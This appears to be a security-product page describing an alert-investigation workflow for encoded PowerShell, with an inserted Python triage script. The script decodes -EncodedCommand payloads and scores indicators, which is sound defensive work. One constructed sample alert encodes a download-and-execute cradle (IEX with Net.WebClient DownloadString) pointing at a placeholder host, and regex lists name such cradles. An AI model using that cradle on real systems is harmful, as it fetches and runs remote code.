Instructions
This blueprint investigates encoded PowerShell alerts. Collect context, identify affected users and hosts, and analyze the suspicious activity.
Preferences
Clear, guided workflow with essential context. Reasonable defaults for time and credit limits, automatic enrichment where possible.
Collect Alert information from Triage Agent and search users or machines in the CMDB with Axonius for context
Enrich the alert details with relevant information from VirusTotal
Check for Suspicious Execution
Search for signs of lateral movement or infection spread using the Investigation Agent with VirusTotal and MITRE ATT&CK...
Document the investigation and close the case
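The "Check for Suspicious Execution" step above hinges on one local action an analyst can script: decode the `-EncodedCommand` argument (base64 of UTF-16LE text) from the alert's process command line and look for the content and launch options that usually justify escalation. The following is an added example, not code from the blueprint or its vendor; the alert command lines are constructed samples, and the indicator lists and verdict tiers are this example's own choices rather than anything the page specifies.

```python
"""Decode and triage the command line from an encoded-PowerShell alert.

Added example. Only the local decode-and-check step is modelled; the CMDB,
VirusTotal and MITRE enrichment steps of the blueprint are out of scope.
"""
import base64
import binascii
import re

# Decoded-script content that on its own warrants escalation.
HIGH = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "nested_base64": re.compile(r"FromBase64String", re.I),
}
# Launch options that are common in legitimate automation and only
# raise the verdict to "review" unless a HIGH indicator is also present.
CONTEXT = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-(executionpolicy|ep)\s+bypass", re.I),
}


def find_encoded_blob(cmdline):
    """Return the argument following an -EncodedCommand switch, or None if absent."""
    tokens = cmdline.split()
    for switch, value in zip(tokens, tokens[1:]):
        if switch[0] not in "-/":
            continue
        key = switch[1:].lower()
        # PowerShell accepts any unambiguous prefix: -e, -ec, -enc, ..., -EncodedCommand.
        # "-ex"/"-ExecutionPolicy" do not match because they are not prefixes of the word.
        if key and "encodedcommand".startswith(key):
            return value.strip("\"'")
    return None


def decode_blob(blob):
    """Decode a UTF-16LE base64 blob; None when it is not valid base64 or has an odd byte length."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) == 0 or len(raw) % 2:
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline):
    """Decode the payload (if any) and return decoded text, matched indicators and a verdict."""
    blob = find_encoded_blob(cmdline)
    decoded = decode_blob(blob) if blob is not None else None
    indicators = []
    if blob is not None and decoded is None:
        # A switch with an undecodable argument is itself worth a look (truncated
        # log field, double encoding, or deliberate obfuscation).
        indicators.append("undecodable_payload")
    scan_text = cmdline + "\n" + (decoded or "")
    for name, pattern in list(HIGH.items()) + list(CONTEXT.items()):
        if pattern.search(scan_text):
            indicators.append(name)
    if any(name in HIGH for name in indicators):
        verdict = "suspicious"
    elif indicators:
        verdict = "review"
    else:
        verdict = "low"
    return {"decoded": decoded, "indicators": indicators, "verdict": verdict}


def encode_for_powershell(script):
    """Produce the UTF-16LE base64 form PowerShell expects; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample alerts (not real telemetry); example.invalid is a reserved placeholder host.
SUSPICIOUS_ALERT = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")
)
BENIGN_ALERT = (
    "powershell.exe -ExecutionPolicy RemoteSigned -enc "
    + encode_for_powershell("Get-Service -Name Spooler | Select-Object Status")
)
MALFORMED_ALERT = "powershell.exe -EncodedCommand ZZZZ!!"

if __name__ == "__main__":
    for label, line in (("suspicious", SUSPICIOUS_ALERT), ("benign", BENIGN_ALERT), ("malformed", MALFORMED_ALERT)):
        result = triage(line)
        print(f"{label:10} verdict={result['verdict']:10} indicators={result['indicators']}")
        print(f"{'':10} decoded={result['decoded']!r}")
```

Run it as a script to see the three sample verdicts. Decoding with `errors="replace"` rather than strict decoding keeps the check from crashing on payloads that contain deliberately broken code units, so the analyst still sees the readable part; the two-tier indicator split keeps routine `-NoProfile` automation from being scored the same as a download cradle.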
Drag & drop components to build AI-powered investigation workflows — no code needed.